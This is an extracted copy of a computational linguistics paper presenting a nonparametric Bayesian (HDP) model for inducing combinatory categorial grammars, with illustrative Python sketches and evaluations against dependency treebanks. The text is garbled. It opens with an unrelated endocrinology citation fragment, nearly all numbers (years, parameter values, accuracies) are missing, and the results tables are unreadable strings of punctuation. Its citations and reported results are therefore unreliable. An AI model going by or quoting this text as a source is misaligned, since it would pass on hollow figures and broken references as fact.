niepomniszcze h, pitoia f, katz sb, chervin r & bruno od. primary thyroid disorders in endogenous cushing's syndrome. european journal of endocrinology – . (https://doi.org/ . /eje. . )

received in final form june
accepted july
accepted preprint published online july

transactions of the association for computational linguistics, ( ) – . action editor: sharon goldwater. submitted / ; revised / ; published / . © association for computational linguistics.
an hdp model for inducing combinatory categorial grammars yonatan bisk and julia hockenmaier department of computer science the university of illinois at urbana-champaign n goodwin ave urbana, il {bisk ,juliahmr}@illinois.edu abstract we introduce a novel nonparametric bayesian model for the induction of combinatory cat- egorial grammars from pos-tagged text. it achieves state of the art performance on a number of languages, and induces linguisti- cally plausible lexicons. introduction what grammatical representation is appropriate for unsupervised grammar induction? initial attempts with context-free grammars (cfgs) were not very successful (carroll and charniak, ; charniak, ). one reason may be that cfgs require the specification of a finite inventory of nonterminal cat- egories and rewrite rules, but unless one adopts lin- guistic principles such as x-bar theory (jackendoff, ), these nonterminals are essentially arbitrary labels that can be combined in arbitrary ways. while further cfg-based approaches have been proposed (clark, ; kurihara and sato, ), most re- cent work has followed klein and manning ( ) in developing models for the induction of projec- tive dependency grammars. it has been shown that more sophisticated probability models (headden iii et al., ; gillenwater et al., ; cohen and smith, ) and learning regimes (spitkovsky et al., ), as well as the incorporation of prior lin- guistic knowledge (cohen and smith, ; berg- kirkpatrick and klein, ; naseem et al., ) can lead to significant improvement over klein and manning’s baseline model. the use of dependency grammars circumvents the question of how to obtain an appropriate inventory of categories, since depen- dency parses are simply defined by unlabeled edges between the lexical items in the sentence. but de- pendency grammars make it also difficult to cap- ture non-local structures, and blunsom and cohn ( ) show that it may be advantageous to refor- mulate the underlying dependency grammar in terms of a tree-substitution grammar (tsg) which pairs words with treelets that specify the number of left and right dependents they have. in this paper, we explore yet another option: instead of dependency grammars, we use combinatory categorial gram- mar (ccg, steedman ( ; )), a linguistically expressive formalism that pairs lexical items with rich categories that capture all language-specific in- formation. this may seem a puzzling choice, since ccg requires a significantly larger inventory of cat- egories than is commonly assumed for cfgs. how- ever, unlike cfg nonterminals, ccg categories are not arbitrary symbols: they encode, and are deter- mined by, the basic word order of the language and the number of arguments each word takes. ccg is very similar to tsg in that it also pairs lexical items with rich items that capture all language-specific in- formation. like tsg and projective dependency grammars, we restrict ourselves to a weakly context- free fragment of ccg. but while tsg does not dis- tinguish between argument and modifier dependen- cies, ccg makes an explicit distinction between the two. and while the elementary trees of blunsom and cohn ( )’s tsg and their internal nodel la- bels have no obvious linguistic interpretation, the syntactic behavior of any ccg constituent can be directly inferred from its category. to see whether the algorithm has identified the basic syntactic prop- erties of the language, it is hence sufficient to in- spect the induced lexicon. 
conversely, boonkwan and steedman ( ) show that knowledge of these basic syntactic properties makes it very easy to cre- ate a language-specific lexicon for accurate unsu- pervised ccg parsing. we have recently proposed an algorithm for inducing ccgs (bisk and hocken- maier, b) that has been shown to be competitive with other approaches even when paired with a very simple probability model (gelling et al., ). in this paper, we pair this induction algorithm with a novel nonparametric bayesian model that is based on a different factorization of ccg derivations, and show that it outperforms our original model and many other approaches on a large number of lan- guages. our results indicate that the use of ccg yields grammars that are significantly more robust when dealing with longer sentences than most de- pendency grammar-based approaches. combinatory categorial grammar combinatory categorial grammar (steedman, ) is a linguistically expressive, lexicalized grammar formalism that associates rich syntactic types with words and constituents. for simplicity, we restrict ourselves to the standard two atomic types s (sentences) and n (encompassing both nouns and noun phrases) from which we recursively build categories. complex categories are of the form x/y or x\y, and represent functions which return a result of type x when combined with an argument of type y. the directionality of the slash indicates whether the argument precedes or follows the functor. we write x|y when the direction of the slash does not matter. the ccg lexicon encodes all language-specific information. it pairs every word with a set of cate- gories that define both its specific syntactic behavior as well as the overall word order of the language: n: {he, girl, lunch, ...} n/n: {good, the, eating, ...} s\n: {sleeps, ate, eating, ...} (s\n)/n: {sees, ate, ...} s\s: {quickly, today...} (s\n)/(s\n): {good, the, ...} to draw a simple contrast, in spanish we would expect adjectives to take the category n\n because spanish word ordering dictates that the adjective fol- low the noun. the lexical categories also capture word-word dependencies: head-argument relations are captured by the lexical category of the head (e.g. (s\n)/n), whereas head-modifier relations are cap- tured by the lexical category of the modifier, which is of the form x\x or x/x, and may take further arguments of its own. our goal will be to automati- cally learn these types of lexicons for a language. in figure , we juxtapose several such lexicons which were automatically discovered by our system. the rules of ccg are defined by a small set of of combinatory rules, which are traditionally writ- ten as schemas that define how constituents can be combined in a bottom-up fashion (although genera- tive probability models for ccg view them in a top- down manner, akin to cfg rules). the first, and most obvious, of these rules is function application: x/y y ⇒ x (b >) y x\y ⇒ x (b <) here the functor x/y or x\y is applied to an argument y resulting in x. 
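the application rules above can be made concrete with a short sketch. the following python fragment is our own illustration, not code from the paper: the class name, the helper constructors and the toy lexicon are assumptions made purely for the example. it encodes slashed categories and checks forward and backward application.

```python
# A minimal sketch (assumed names, not the paper's code): CCG categories
# and the two function application rules B> and B<.

class Category:
    """An atomic category (e.g. N, S) or a functor X/Y or X\\Y."""
    def __init__(self, result=None, slash=None, arg=None, atom=None):
        self.atom, self.result, self.slash, self.arg = atom, result, slash, arg

    def __eq__(self, other):
        return isinstance(other, Category) and repr(self) == repr(other)

    def __repr__(self):
        if self.atom is not None:
            return self.atom
        wrap = lambda c: repr(c) if c.atom is not None else "(%s)" % repr(c)
        return wrap(self.result) + self.slash + wrap(self.arg)

def atom(name):            # atomic category
    return Category(atom=name)

def fwd(result, arg):      # X/Y: expects its argument Y to the right
    return Category(result=result, slash="/", arg=arg)

def bwd(result, arg):      # X\Y: expects its argument Y to the left
    return Category(result=result, slash="\\", arg=arg)

def apply_forward(left, right):
    """B>: X/Y  Y  =>  X (returns None if the rule does not apply)."""
    if left.atom is None and left.slash == "/" and left.arg == right:
        return left.result
    return None

def apply_backward(left, right):
    """B<: Y  X\\Y  =>  X (returns None if the rule does not apply)."""
    if right.atom is None and right.slash == "\\" and right.arg == left:
        return right.result
    return None

# toy derivation for "the man ate lunch" with an assumed lexicon
N, S = atom("N"), atom("S")
the, man, lunch = fwd(N, N), N, N          # the := N/N,  man, lunch := N
ate = fwd(bwd(S, N), N)                    # ate := (S\N)/N
np = apply_forward(the, man)               # N/N   N     => N
vp = apply_forward(ate, lunch)             # (S\N)/N  N  => S\N
print(apply_backward(np, vp))              # N   S\N     => S
```

run as-is, the last line prints the category s, mirroring the bottom-up derivation a ccg parser would build for a simple transitive sentence.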
while standard ccg has a number of additional combinatory rules (type- raising, generalized variants of composition and substitution) that increase its generative capacity be- yond context-free grammars and allow an elegant treatment of non-local dependencies arising in ex- traction, coordination and scrambling, we follow bisk and hockenmaier ( b) and use a restricted fragment, without type-raising, that allows only ba- sic composition and is context-free: x/y y/z ⇒ x/z (b > ) x/y y\z ⇒ x\z (b x>) y\z x\y ⇒ x\z (b < ) y/z x\y ⇒ x/z (b x<) the superscript denotes the arity of the compo- sition which is too low to recover non-projective de- pendencies, and our grammar is thus weakly equiva- lent to the dependency grammar representations that are commonly used for grammar induction. the main role of composition in our fragment is that it allows sentential and verb modifiers to both take cat- egories of the form s\s and s/s. composition in- troduces spurious ambiguities, which we eliminate by using eisner ( )’s normal form. coordinating conjunctions have a special cate- gory conj, and we binarize coordination as follows (hockenmaier and steedman, ): x x[conj] ⇒& x (& ) conj x ⇒& x[conj] (& ) category induction unlike dependency grammars, ccg requires an in- ventory of lexical categories. given a set of lexical categories, the combinatory rules define the set of parses for each sentence. we follow the algorithm proposed by bisk and hockenmaier ( b) to au- tomatically induce these categories. the lexicon is initialized by pairing all nominal tags (nouns, pro- nouns and determiners) with the category n, all verb tags with the category s, and coordinating conjunc- tions with the category conj: conj → conj det, noun, num, pron → n verb → s although our lexicons are defined over corpus- specific pos tags, we use a slightly modified version of petrov et al. ( )’s universal pos tagset to cat- egorize them into these broad classes. the primary changes we make to their mappings are the addition of a distinction (where possible) between subordi- nating and coordinating conjunctions and between main and auxiliary verbs . since the initial lexicon consists only of atomic categories, it cannot parse any complex sentences: the man ate quickly dt nns vbd rb - n s - complex lexical categories are induced by con- sidering the local context in which tokens appear. given an input sentence, and a current lexicon which assigns categories to at least some of the tokens in the sentence, we apply the following two rules to add new categories to the lexicon: the argument rule allows any lexical tokens that have categories other than n and conj to take immediately adjacent the normal-form of hockenmaier and bisk ( ) is not required for this fragment of ccg. this distinction was suggested by the authors (p.c.) ns as arguments. the modifier rule allows any to- ken (other than coordinating conjunctions that ap- pear in the middle of sentences) to modify an imme- diate neighbor that has the category s or n or is a modifier (s|s or n|n) itself. the man ate quickly dt nns vbd rb n/n n, s/s s, n\n s\s s\n these rules can be applied iteratively to form more complex categories. we restrict lexical cate- gories to a maximal arity of , and disallow the cat- egory (s/n)\n, since it is equivalent to (s\n)/n. the man ate quickly dt nns vbd rb n/n, n, s/s s, n\n, s\s, (s/s)/(s/s)(n\n)/(n\n) s\n (n\n)\(n\n) (n/n)\(n/n) (s/s)\(s/s) (s\s)/(s\s) the resultant, overly general, lexicon is then used to parse the training data. 
each complete parse has to be of category s or n, with the constraint that sentences that contain a main verb can only form parses of category s. a new probability model for ccg generative models define the probability of a parse tree τ as the product of individual rule probabili- ties. our previous work (bisk and hockenmaier, b) uses the most basic model of hockenmaier and steedman ( ), which first generates the head direction (left, right, unary, or lexical), followed by the head category, and finally the sister category. this factorization does not take advantage of the unique functional nature of ccg. we therefore in- troduce a new factorization we call the argument model. it exploits the fact that ccg imposes strong constraints on a category’s left and right children, since these must combine to create the parent type via one of the combinators. in practice this means that given the parent x/z, the choice of combinator c and an argument y we can uniquely determine the categories of the left and right children: huang et al. ( ) present a (deficient) variant and bayesian extension of the bisk and hockenmaier ( b) model without k-best smoothing that both underperform our published results. if x is an atomic category, only application is possible. parent c ⇒ left right x/z b > (x/z)/y y b < y (x/z)\y b > x/y y/z b < y/z x\y and correspondingly for x\z: parent c ⇒ left right x\z b > (x\z)/y y b < y (x\z)\y b > x/y y\z b < y\z x\y while type-changing and raising are not used in this work the model’s treatment of root productions extends easily to handle these other unary cases. we simply treat the argument y as the unary outcome so that the parent, combinator and argument uniquely specify every detail of the unary rule: parent c ⇒ y top top ∈{s,n} s/(s\n) t< n s\(s/n) t> n we still distinguish the same rule types as before (lexical, unary, binary with head left/right), leading us to the following model definition: given: p := x/z where type(t) ∈{left,right,unary,lex} p(t|p) × { p(w|p, t) lex p(y|p, t) ×p(c|p, t,y) o.w. argument combinator note that this model generates only one ccg cat- egory but uniquely defines the two children of a par- ent node. we will see below that this greatly simpli- fies the development of non-parametric extensions. hdp-ccg: a nonparametric model simple generative models such as pcfgs or bisk and hockenmaier ( b)’s ccg model are not robust in the face of sparsity, since they assign zero probability to any unseen event. sparsity is a particular problem for formalisms like ccg that have a rich inventory of object types. nonpara- metric bayesian models, e.g. dirichlet processes (teh, ) or their hierarchical variants (teh et al., ) and generalizations (teh, ) overcome this problem in a very elegant manner, and are used by many state-of-the-art grammar induction systems (naseem et al., ; blunsom and cohn, ; boonkwan and steedman, ). they also im- pose a rich-getting-richer behavior that seems to be advantageous in many modeling applications. by contrast, bisk and hockenmaier ( b) propose a weighted top-k scheme to address these issues in an ad-hoc manner. the argument model introduced above lends it- self particularly well to nonparametric extensions such as the standard hierarchical dirichlet pro- cesses (hdp). in this work the size of the grammar and the number of productions are fixed and small, but we present the formulation as infinite to allow for easy extension in the future. 
specifically, this framework allows for extensions which grow the grammar during parsing/training or fully lexicalize the productions. additionally, while our current work uses only a restricted fragment of ccg that has only a finite set of categories, the literature's generalized variants of composition make it possible to generate categories of unbounded arity. we therefore believe that this is a very natural probabilistic framework for ccg, since hdps make it possible to consider a potentially infinite set of categories that can instantiate the y slot, while allowing the model to capture language-specific preferences for the set of categories that can appear in this position.

the hdp-ccg model

in bayesian models, multinomials are drawn from a corresponding n-dimensional dirichlet distribution. the dirichlet process (dp) generalizes the dirichlet distribution to an infinite number of possible outcomes, allowing us to deal with a potentially infinite set of categories or words. dps are defined in terms of a base distribution h that corresponds to the mean of the dp, and a concentration or shape parameter α. in a hierarchical dirichlet process (teh et al., ), there is a hierarchy of dps, such that the base distribution of a dp at level n is a dp at level n−1.

the hdp-ccg (figure ) is a reformulation of the argument model introduced above in terms of hierarchical dirichlet processes. at the heart of the model is a distribution over ccg categories. by combining a stick breaking process with a multinomial over categories we can define a dp over ccg categories whose stick weights (βy) correspond to the frequency of the category in the corpus (an alternative hdp model for semantic parsing with ccg is proposed by kwiatkowski et al. ( )). next we build the hierarchical component of our model by choosing an argument distribution (φy), again over the space of categories, for every parent x/z. this argument distribution is drawn from the previously defined base dp, allowing for an important level of parameter tying across all argument distributions.

hdp-ccg
1) draw global parameters
   define mle root parameter θtop
   draw top-level symbol weights βy ∼ gem(αy)
   draw top-level lexical weights βl ∼ gem(αl)
   for each grammar symbol z ∈ {1, 2, ...}:
      define mle rule type parameters θt_z
      draw argument parameters φy_z ∼ dp(αy, βy)
      draw lexical emission parameters φl_z ∼ dp(αl, βl)
      for each grammar symbol y ∈ {1, 2, ...}:
         define mle combinator parameters θc_{z,y}
2) for each parse tree:
   generate root node ztop ∼ binomial(θtop)
   for each node i in the parse tree:
      choose rule type ti ∼ multinomial(θt_{zi})
      if ti == lex: emit terminal symbol xi ∼ multinomial(φl_{zi})
      if ti == left/right/unary:
         generate argument category yi ∼ multinomial(φy_{zi})
         generate combinator ci ∼ multinomial(θc_{zi,yi})
         deterministically create zl(i) (and zr(i) if binary)

because we are working with ccg, the parent zi, argument yi and combinator ci uniquely define the two children categories (zl(i), zr(i)); in the accompanying graphical model, dashed arrows represent the deterministic process used to generate these two categories. figure : the hdp-ccg has two base distributions, one over the space of categories and the other over words (or tags). for every grammar symbol, an argument distribution and emission distribution is drawn from the corresponding dirichlet processes. in addition, there are several mle distributions tied to a given symbol for generating rule types, combinators and lexical tokens.
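the generative story above can be exercised numerically with a truncated approximation; the sketch below uses numpy to draw truncated stick-breaking weights for the shared base distribution and dirichlet draws as finite stand-ins for dp(αy, βy). the truncation level, concentration values and number of grammar symbols are illustrative, not the settings used in the experiments.

```python
# a numerical sketch of the hierarchy: a truncated stick-breaking (gem) draw
# gives the shared base weights beta_y, and each conditioning symbol's argument
# distribution is a dirichlet draw centred on beta_y (a finite stand-in for
# dp(alpha_y, beta_y)).
import numpy as np

rng = np.random.default_rng(0)

def gem(alpha, truncation):
    """Truncated stick-breaking weights."""
    sticks = rng.beta(1.0, alpha, size=truncation)
    remaining = np.concatenate(([1.0], np.cumprod(1.0 - sticks[:-1])))
    weights = sticks * remaining
    weights[-1] = 1.0 - weights[:-1].sum()    # absorb the leftover stick mass
    return weights

K = 50                                        # truncated category inventory
alpha_y = 10.0
beta_y = gem(alpha=1.0, truncation=K)         # shared base over argument categories

# each conditioning symbol z draws its own argument distribution, tied to the
# base: a larger alpha_y keeps the draw closer to beta_y (higher precision).
phi_y = {z: rng.dirichlet(alpha_y * beta_y) for z in range(5)}

# generating one node under symbol z: pick an argument category index, after
# which the combinator and the two children follow as described above.
z = 2
y = rng.choice(K, p=phi_y[z])
print(beta_y[:5], y)
```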
while the base dp does define the mean around which all argument distributions are drawn, we also require a notion of variance or precision which determines how similar individual draws will be. this precision is determined by the magnitude of the hyperparameter αy. this hierarchy is paralleled for lexical productions, which are drawn from a unigram base dp over terminal symbols controlled by αl. for simplicity we use the same scheme for setting the values for αl as αy. we present experimental results in which we vary the value of αy as a function of the number of outcomes allowed by the grammar for argument categories, or the corpus in the case of terminal symbols. specifically, we set αy = n^p for conditioning contexts with n outcomes. since liang et al. ( ) found that the ideal value for alpha appears to be superlinear but subquadratic in n, we present results where p takes the values , . , . , and . to explore the range from uniform to quadratic. this setting for α is the only free parameter in the model. by controlling precision we can tell the model to what extent global corpus statistics should be trusted. we believe this has a similar effect to bisk and hockenmaier ( b)'s top-k upweighting and smoothing scheme.

one advantage of the argument model is that it only requires a single distribution over categories for each binary tree. in contrast to similar proposals for cfgs (liang et al., ), which impose no formal restrictions on the nonterminals x, y, z that can appear in a rewrite rule x → y z, this greatly simplifies the modeling problem (yielding effectively a model that is more akin to nonparametric hmms), since it avoids the need to capture correlations between different base distributions for y and z.

variational inference

hdps need to be estimated with approximate techniques. as an alternative to gibbs sampling (teh et al., ), which is exact but typically very slow and has no clear convergence criteria, variational inference algorithms (bishop, ; blei and jordan, ) estimate the parameters of a truncated model to maximize a lower bound of the likelihood of the actual model. this allows for factorization of the model and a training procedure analogous to the inside-outside algorithm (lari and young, ), allowing training to run very quickly and in a trivially parallelizable manner.

to initialize the base dp's stick weights, we follow the example of kurihara et al. ( ) and use an mle model initialized with uniform distributions to compute global counts for the categories in our grammar. when normalized, these provide a better initialization than a uniform set of weights. updates to the distributions are then performed in a coordinate descent manner which includes re-estimation of the base dps.

in variational inference, multinomial weights w take the place of probabilities. the weights for an outcome y with conditioning variable p are computed by summing pseudocounts with a scaled mean vector from the base dp. the computation involves moving in the direction of the gradient of the dirichlet distribution, which results in the following difference of digammas (Ψ):

wp(y) = Ψ(c(p,y) + αp βy) − Ψ(c(p,∗) + αp)

importantly, the digamma and multinomial weights comprise a rich-get-richer scheme, biasing the model against rare outcomes. in addition, since variational inference is done by coordinate descent, it is trivially parallelizable.
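the update above is straightforward to state in code. a minimal sketch of the difference-of-digammas weight, assuming expected counts supplied by an inside-outside e-step; the example numbers are illustrative.

```python
# a sketch of the weight update quoted above: expected counts are combined with
# the scaled base-dp mean through a difference of digammas, giving the log of
# the effective multinomial weight for outcome y in context p.
from scipy.special import digamma

def multinomial_weight(count_py, count_p_total, alpha_p, beta_y):
    """w_p(y) = digamma(c(p,y) + a_p*b_y) - digamma(c(p,*) + a_p)."""
    return (digamma(count_py + alpha_p * beta_y)
            - digamma(count_p_total + alpha_p))

# a rare outcome with a small base weight is pushed below its raw relative
# frequency, which is the rich-get-richer bias discussed above.
print(multinomial_weight(count_py=2.0, count_p_total=100.0,
                         alpha_p=50.0, beta_y=0.01))
```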
in practice, training and testing our models on the corpora containing sen- tences up to length used in this paper takes be- tween one minute to at most three hours on a single -core machine depending on their size. evaluation as is standard for this task, we evaluate our systems against a number of different dependency treebanks, and measure performance in terms of the accuracy of directed dependencies (i.e. the percentage of words in the test corpus that are correctly attached). we use the data from the pascal challenge for grammar induction (gelling et al., ), the data from the conll-x shared task (buchholz and marsi, ) and goldberg ( )’s hebrew corpus. converting ccg derivations into dependencies is mostly straightforward, since the ccg derivation identifies the root word of each sentence, and head- argument and head-modifier dependencies are easily read off of ccg derivations, since the lexicon de- fines them explicitly. unlike dependency grammar, ccg is designed to recover non-local dependencies that arise in control and binding constructions as well as in wh-extraction and non-standard coordi- nation, but since this requires re-entrancies, or co- indexation of arguments (hockenmaier and steed- man, ), within the lexical categories that trigger these constructions, our current system returns only local dependencies. but since dependency gram- mars also captures only local dependencies, this has no negative influence on our current evaluation. however, a direct comparison between depen- dency treebanks and dependencies produced by ccg is more difficult (clark and curran, ), since dependency grammars allow considerable freedom in how to analyze specific constructions such as verb clusters (which verb is the head?) prepositional phrases and particles (is the head the noun or the preposition/particle?), subordinating conjunctions (is the conjunction a dependent of the head of the main clause and the head of the embed- ded clause a dependent of the conjunction, or vice versa?) and this is reflected in the fact that the tree- banks we consider often apply different conventions for these cases. although remedying this issue is beyond the scope of this work, these discrepancies very much hint at the need for a better mechanism to evaluate linguistically equivalent structures or tree- bank standardization. the most problematic construction is coordina- tion. in standard ccg-to-dependency schemes, both conjuncts are independent, and the conjunction itself is not attached to the dependency graph, whereas de- pendency grammars have to stipulate that either one of the conjuncts or the conjunction itself is the head, with multiple possibilities of where the remaining constituents attach. in addition to the standard ccg scheme, we have identified five main styles of con- junction in our data (figure ), although several cor- pora distinguish multiple types of coordinating con- junctions which use different styles (not all shown here). since our system has explicit rules for coordi- nation, we transform its output into the desired target representation that is specific to each language. experiments we evaluate our system on different languages. in each case, we follow the test and training regimes that were used to obtain previously published results in order to allow a direct comparison. we com- pare our system to the results presented at the pas- cal challenge on grammar induction (gelling et al., ) , as well as to gillenwater et al. ( ) and naseem et al. ( ). 
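a minimal sketch of the directed-dependency accuracy used throughout these comparisons, assuming gold and predicted head indices aligned word for word (with punctuation already removed, as in our experimental setting).

```python
# directed dependency accuracy: the fraction of words whose predicted head
# index matches the gold head, pooled over all test sentences.
def directed_accuracy(gold_heads, pred_heads):
    """Each argument: list of sentences, each a list of head indices (0 = root),
    aligned word for word."""
    correct = total = 0
    for gold, pred in zip(gold_heads, pred_heads):
        correct += sum(g == p for g, p in zip(gold, pred))
        total += len(gold)
    return correct / total if total else 0.0

# e.g. two short sentences with one attachment error in the second:
print(directed_accuracy([[2, 0, 2], [0, 1]], [[2, 0, 2], [0, 2]]))  # 0.8
```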
we use nivre ( )’s penn malt implementation of collins ( )’s head rules to translate the wsj penn treebank (marcus et al., ) into dependencies. finally, when train- ing the mle version of our model we use a simple smoothing scheme which defines a small rule proba- bility (e− ) to prevent any rule used during training from going to zero. . pascal challenge on grammar induction in table , we compare the performance of the ba- sic argument model (mle), of our hdp model with four different settings of the hyperparameters (as ex- plained above) and of the systems presented in the pascal challenge on grammar induction (gelling et al., ). the systems in this competition were instructed to train over the full dataset, including the unlabelled test data, and include bisk and hocken- maier ( a)’s ccg-based system (bh) to cohn et al. ( )’s reimplementation of klein and manning ( )’s dmv model in a tree-substitution gram- mar framework (bc), as well as three other de- pendency based systems which either incorporate naseem et al. ( )’s rules in a deterministic fash- ion (søgaard, ), rely on extensive tuning on numbers are from personal correspondence with the orga- nizers. the previously published numbers are not comparable to literature due to an error in the evaluation. http://wiki. cs.ox.ac.uk/inducinglinguisticstructure/ resultsdepcomparable the development set (tu, ) or incorporate mil- lions of additional tokens from wikipedia to esti- mate model parameters (marecek and zabokrtsky, ). we ignore punctuation for all experiments reported in this paper, but since the training data (but not the evaluation) includes punctuation marks, participants were free to choose whether to include punctuation or ignore it. while bh is the only other system with directly interpretable linguistic output, we also include a di- rect comparison with bc, whose tsg representa- tion is equally expressive to ours. finally we present a row with the maximum performance among the other three models. as we have no knowledge of how much data was used in the training of other sys- tems we simply present results for systems trained on length (not including punctuation) sentences and then evaluated at lengths and . the mle version of our model shows rather vari- able performance: although its results are particu- larly bad on basque (eu), it outperforms both bh and bc on some other settings. by contrast, the hdp system is always better than the mle model. it outperforms all other systems on half of the cor- pora. on average, it outperforms bh and bc by . % and . % on length , or . % and . % on length respectively. the main reason why our system does not outperform bc by an even higher margin is the very obvious . %/ . % deficit on slovene. however, the slovene dependency tree- bank seems to follow a substantially different anno- tation scheme. in particular, the gold standard an- notation of the , sentences in the slovene de- velopment set treats many of them as consisting of independent sentences (often separated by punctua- tion marks that our system has no access to), so that the average number of roots per sentence is . : >> “ verjeti believe ti i , , 〈〈 ” je is mehko soft rekla said when our system is presented with these short components in isolation, it oftentimes analyzes them correctly, but since it has to return a tree with a sin- gle root, its performance degrades substantially. 
we believe the hdp performs so well as com- pared to the mle model because of the influence of the shared base distribution, which allows the ar, eu, cs, nl, wsj, ch, he da, he es, bg, de, pt sv, sl ja noun conj noun noun conj noun noun conj noun noun conj noun noun conj noun figure : in the treebanks used for evaluation different standards exist for annotating coordination. while not exhaustive, this table demonstrates five of the most common schemes used in the literature. syntactically these are identical and traditionally ccg draws arcs only to the arguments without attaching the conjunction. for the purposes of comparison with the literature we have implemented these five translation schemes. arabic danish slovene swedish dutch basque portuguese wsj childes czech # tokens , , , , , , , , , , # tags pa sc a l bc . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . max . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . bh . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . t hi s w or k mle . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . hdp . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . hdp . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . hdp . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . hdp . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / . +/− - . /- . + . /+ . - . /- . + . /+ . + . /+ . - . /- . + . /+ . - . /- . + . /+ . - . /- . table : a comparison of the basic argument model (mle) and four hyper-parameter settings of the hdp- ccg against two syntactic formalisms that participated in the pascal challenge (gelling et al., ), bh (bisk and hockenmaier, a) and bc (blunsom and cohn, ), in addition to a max over all other participants. we trained on length data (punctuation removed), including the test data as recommended by the organizers. the last row indicates the difference between our best system and the competition. global category distribution to influence each of the more specific distributions. further, it provides a very simple knob in the choice of hyperparame- ters, which has a substantial effect on performance. a side effect of the hyperparameters is that their strength also determines the rate of convergence. this may be one of the reasons for the high vari- ance seen in the four settings tested, although we note that since our initialization is always uniform, and not random, consecutive runs do not introduce variance in the model’s performance. . comparison with systems that capture linguistic constraints since our induction algorithm is based on the knowl- edge of which pos tags are nouns and verbs, we compare in table our system to naseem et al. ( ), who present a nonparametric dependency model that incorporates thirteen universal linguistic constraints. three of these constraints correspond to our rules that verbs are the roots of sentences and may take nouns as dependents, but the other ten con- straints (e.g. that adjectives modify nouns, adverbs modify adjectives or verbs, etc.) have no equivalent in our system. although our system has less prior knowledge, it still performs competitively. on the wsj, naseem et al. demonstrate the im- portance and effect of the specific choice of syntactic rules by comparing the performance of their system with hand crafted universal rules ( . ), with en- glish specific rules ( . ), and with rules proposed by druck et al. ( ) ( . ). 
the performance of naseem et al.’s system drops very significantly as sentence length (and presumable parse complexity) sl es da pt sv ∼#tokens . k . k . k k k n . . . . . hdp . . . . . table : a comparison of our system with naseem et al. ( ), both trained and tested on the length training data from the conll-x shared task. increases, whereas our system shows significantly less decline, and outperforms their universal system by a significant margin. ≤ ≤ naseem universal rules . . naseem english rules . . hdp-ccg . . hdp-ccg (train ≤ ) . in contrast to spitkovsky et al. ( ), who reported that performance of their dependency based system degrades when trained on longer sentences, our per- formance on length sentences increases to . when we train on sentences up to length . another system that is also based on ccg, but captures significantly more linguistic knowledge than ours, was presented by boonkwan and steed- man ( ), who achieve an accuracy of . on wsj section (trained on sections - ). us- ing the same settings, our system achieves an accu- racy of . . unlike our approach, boonkwan and steedman do not automatically induce an appropri- ate inventory of lexical category, but use an exten- sive questionnaire that defines prototype categories for various syntactic constructions, and requires sig- nificant manual engineering of which pos tags are mapped to what categories to generate a language- specific lexicon. however, their performance de- grades significantly when only a subset of the ques- tions are considered. using only the first ques- tions, covering facts about the ordering of subjects, verbs and objects, adjectives, adverbs, auxiliaries, adpositions, possessives and relative markers, they achieve an accuracy of . , which is almost iden- our earlier generative model showed similar behavior, al- though the results in bisk and hockenmaier ( b) are not directly comparable due to differences in the data. sl es da pt sv #tokens , , , , , g . . . . . hdp . . . . . bg wsj nl ja de #tokens , , , , , g . . . . . hdp . . . . . table : a comparison of our system with gillenwa- ter et al. ( ), both trained on the length train- ing data, and tested on the length test data, from the conll-x shared task. tical to ours, even though we use significantly less initial knowledge. however, the lexicons we present below indicate that we are in fact learning many of the very exact details that in their system are con- structed by hand. the remaining questions in boonkwan and steedman’s questionnaire cover less frequent phenomena such as the order of negative markers, dative shift, and pro-drop. the obvious ad- vantage of this approach is that this allows them to define a much more fine-grained inventory of lexical categories than our system can automatically induce. we also stipulate that for certain languages knowl- edge of pro-drop could play a significant role in the success of their approach: if complete sentences are allowed to be of the form s\n or s/n, the same lex- ical category can be used for the verb regardless of whether the subject is present or has been dropped. . additional languages in order to provide results on additional languages, we present in table a comparison to the work of gillenwater et al. ( ) (g ), using the conll-x shared task data (buchholz and marsi, ). fol- lowing gillenwater et al., we train only on sentences of length from the training set and evaluate on the test set. 
since this is a different training regime, and these corpora differ for many languages from that of the pascal challenge, numbers from table can- not be compared directly with those in table . we have also applied our model to goldberg ( )’s hebrew corpus, where it achieves an accuracy of . (trained and tested on all sentences length ; , ) and . (length ; , tokens). arabic % swedish % wsj % childes % japanese % czech % verb (s\n)/n s s\n s/n s s (s/n)/n s\n (s\n)/n s s\n adp n\n (s\s)/n (s\s)/n (s\s)/n (s/s)\n (s\s)/n n/n (n\n)/n (n\n)/n n/n n\n (s/s)/n noun n\n n n n n n n n/n adj n\n n/n n/n n/n s/s n/n figure : partial lexicons demonstrating language specific knowledge learned automatically for five lan- guages. for ease of comparison between languages, we use the universal tag label (verb, adposition, noun and adjective). shown are the most common categories and the fraction of occurrences of the tag that are assigned this category (according to the viterbi parses). the induced lexicons since our approach is based on a lexicalized for- malism such as ccg, our system automatically in- duces lexicons that pair words (or, in our case, pos- tags) with language-specific categories that capture their syntactic behavior. if our approach is success- ful, it should learn the basic syntactic properties of each language, which will be reflected in the corre- sponding lexicon. in figure one sees how verbs subcategorize differently, how word ordering differs by language, and how the attachment structures of prepositions are automatically discovered and differ across languages. in arabic, for example, the sys- tem learns that word order is variable and therefore the verb must allow for both svo and vos style constructions. we generally learn that adpositions (prepositions or postpositions) take nouns as argu- ments. in czech, pps can appear before and after the verb, leading to two different categories ((s\s)/n and (s/s)/n). japanese has postpositions that ap- pear in preverbal position ((s/s)\n), but when this category is assigned to nominal particles that cor- respond to case markers, it effectively absorbs the noun, leading to a preference for verbs that do not take any arguments (s), and to a misanalysis of ad- jectives as verb modifiers (s/s). our lexicons also reflect differences in style: while childes and the wsj are both english, they represent very different registers. we learn that subjects are mostly absent in the informal speech and child-directed instructions contained in childes, while effectively mandatory in the wall street journal. conclusions this paper has introduced a novel factorization for ccg models and showed how when combined with non-parametric bayesian statistics it can compete with every other grammar induction system cur- rently available, including those that capture a sig- nificant amount of prior linguistic knowledge. the use of a powerful syntactic formalism proves ben- eficial both in terms of requiring very limited uni- versal knowledge and robustness at longer sentence lengths. unlike standard grammar induction sys- tems that are based on dependency grammar, our system returns linguistically interpretable lexicons for each language that demonstrate it has discov- ered their basic word order. of particular note is the simplicity of the model both algorithmically and in terms of implementation. 
